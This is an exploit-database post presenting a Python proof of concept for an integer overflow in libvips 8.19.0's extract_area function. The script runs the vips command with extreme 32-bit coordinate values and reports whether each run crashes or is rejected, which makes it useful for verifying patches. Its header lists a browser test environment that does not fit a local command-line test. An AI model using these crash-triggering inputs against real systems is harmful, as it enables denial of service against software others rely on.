## https://sploitus.com/exploit?id=PACKETSTORM:216458
=============================================================================================================================================
| # Title : libvips 8.19.0 vips_extract_area_build Local Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.libvips.org/ |
=============================================================================================================================================
[+] Summary : This Python script performs an advanced security audit on the vips image processing tool (libvips 8.19.0), specifically targeting
the integer overflow vulnerability (CVE-2026-3284) in the function vips_extract_area_build.
[+] Key Features:
Safe Environment Setup:
Creates a large temporary image (10,000 × 10,000) to avoid memory exhaustion while testing boundary conditions.
Verifies the existence of the vips binary before execution.
Targeted Probes:
Tests maximum and minimum 32-bit integer values and out-of-bounds scenarios for the extract_area arguments.
Monitors for crashes (SIGSEGV, SIGABRT) or AddressSanitizer errors; AddressSanitizer reports appear only if the vips binary under test was built with ASan.
Detailed Reporting:
Outputs a formatted table showing each test scenario, verdict (crash or safe), return code, and a snippet of stderr.
Cleanup:
Safely removes temporary input and output files after testing.
Purpose:
The script acts as a PoC for local exploitation of CVE-2026-3284, useful for security researchers to verify vulnerabilities before patching.
Applying the official patch (24795bb3d19d84f7b6f5ed86451ad556c8f2fe70) or updating libvips is strongly recommended.
[+] POC :
import os
import shutil
import signal
import subprocess
import time
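class VipsAdvancedAudit:
    """Boundary-value crash check for the ``vips extract_area`` command.

    Creates a scratch input image, runs ``extract_area`` with extreme
    ``left``/``width`` arguments, and records for each run whether the
    process rejected the input, crashed, or could not be assessed at all.
    Useful for confirming whether a given libvips build still mishandles
    these arguments, for example before and after applying a fix.
    """

    # 134 and 139 are the 128+signal statuses a shell reports for SIGABRT
    # and SIGSEGV; 11 is the bare SIGSEGV number, presumably for wrappers
    # that report it directly (unverified).
    # NOTE(review): Windows fault codes (large positive NTSTATUS values) are
    # not recognised by this list.
    _CRASH_EXIT_CODES = (134, 139, 11)

    # Sentinel codes recorded when no real exit status is available.
    _TIMEOUT_CODE = -999
    _LAUNCH_ERROR_CODE = -888

    # Stored lowercase because they are matched against lowercased stderr;
    # mixed-case keywords could never match.
    _CRASH_KEYWORDS = (
        "addresssanitizer",
        "segv",
        "segmentation fault",
        "buffer-overflow",
    )

    def __init__(self, binary_path="./vips"):
        """Remember the binary to test and pick scratch file names.

        Args:
            binary_path: Path or command name of the ``vips`` executable.
        """
        self.vips_bin = binary_path
        # Names depend only on the current second, so two runs started in
        # the same second from one directory would share these files.
        self.in_file = f"audit_in_{int(time.time())}.v"
        self.out_file = f"audit_out_{int(time.time())}.v"
        self.results = []

    def setup(self):
        """Locate the vips binary and create the scratch input image.

        Returns:
            True when the binary was found and ``vips black`` produced the
            10000x10000 input image, False otherwise.
        """
        print(f"[*] Initializing Audit on: {self.vips_bin}")
        # shutil.which does the PATH lookup in-process, so the check also
        # works on systems that have no `which` executable.
        if not os.path.exists(self.vips_bin) and shutil.which(self.vips_bin) is None:
            print("[-] Error: vips binary not found.")
            return False
        try:
            subprocess.run(
                [self.vips_bin, "black", self.in_file, "10000", "10000"],
                capture_output=True,
                check=True,
            )
        except (OSError, subprocess.SubprocessError) as e:
            print(f"[-] Setup failed (possibly Disk space or Vips error): {e}")
            return False
        return True

    def probe(self, name, left, width):
        """Run one ``extract_area`` call and record how the process ended.

        Args:
            name: Label shown in the report.
            left: Value passed as the ``left`` argument.
            width: Value passed as the ``width`` argument.

        Appends a dict with the keys ``name``, ``status``, ``code`` and
        ``msg`` to ``self.results``. ``code`` is the process return code,
        -999 on timeout, or -888 when the process could not be started.
        A timeout or launch failure is reported as inconclusive, not as a
        crash, because nothing was learned about the library in that case.
        """
        env = os.environ.copy()
        # Make an ASan-instrumented build abort on its first report so the
        # failure shows up in the exit status; no effect on other builds.
        env["ASAN_OPTIONS"] = "detect_leaks=0:abort_on_error=1:halt_on_error=1"
        cmd = [
            self.vips_bin, "--vips-max-coord", "2147483647",
            "extract_area", self.in_file, self.out_file,
            str(left), "0", str(width), "10",
        ]

        inconclusive = False
        try:
            # errors="replace" keeps undecodable bytes in stderr from raising
            # while the output is being captured.
            proc = subprocess.run(
                cmd,
                env=env,
                capture_output=True,
                text=True,
                errors="replace",
                timeout=15,
            )
            ret_code = proc.returncode
            stderr = proc.stderr or ""
        except subprocess.TimeoutExpired:
            inconclusive = True
            ret_code = self._TIMEOUT_CODE
            stderr = "Execution Timeout - Possible logic hang or heavy processing"
        except (OSError, ValueError, subprocess.SubprocessError) as e:
            inconclusive = True
            ret_code = self._LAUNCH_ERROR_CODE
            stderr = str(e)

        is_crash = False
        if not inconclusive:
            # A negative return code means the child was killed by a signal.
            if ret_code < 0 or ret_code in self._CRASH_EXIT_CODES:
                is_crash = True
            lowered = stderr.lower()
            if any(key in lowered for key in self._CRASH_KEYWORDS):
                is_crash = True

        if inconclusive:
            verdict = "INCONCLUSIVE"
        elif is_crash:
            verdict = "B0000M CRASH"
        else:
            verdict = "OK๏ธ REJECTED (Safe)"

        self.results.append({
            "name": name,
            "status": verdict,
            "code": ret_code,
            "msg": stderr[:40].replace('\n', ' '),
        })

    def run_suite(self):
        """Probe the three built-in boundary cases in order."""
        cases = [
            ("INT32 Max Overflow", 2147483647, 100),
            ("Negative Boundary Wrap", -2147483648, 1),
            ("Standard OOB", 50000, 10),
        ]
        for name, left, width in cases:
            self.probe(name, left, width)

    def cleanup(self):
        """Remove the scratch input and output files, best effort."""
        for path in (self.in_file, self.out_file):
            try:
                os.remove(path)
            except FileNotFoundError:
                # Never created, or already gone: nothing to do.
                continue
            except OSError as e:
                # Keep cleanup non-fatal, but do not hide a leftover file.
                print(f"[-] Could not remove {path}: {e}")

    def report(self):
        """Print one table row per recorded probe result."""
        print("\n" + "="*95)
        print(f"{'Scenario':<25} | {'Verdict':<20} | {'Code':<6} | {'Stderr Snippet'}")
        print("-" * 95)
        for r in self.results:
            print(f"{r['name']:<25} | {r['status']:<20} | {r['code']:<6} | {r['msg']}")
        print("="*95)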
if __name__ == "__main__":
    audit = VipsAdvancedAudit()
    try:
        # The probes need the input image, so they run only after a
        # successful setup.
        setup_ok = audit.setup()
        if setup_ok:
            audit.run_suite()
            audit.report()
    finally:
        # Scratch files are removed even when setup or a probe raised.
        audit.cleanup()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================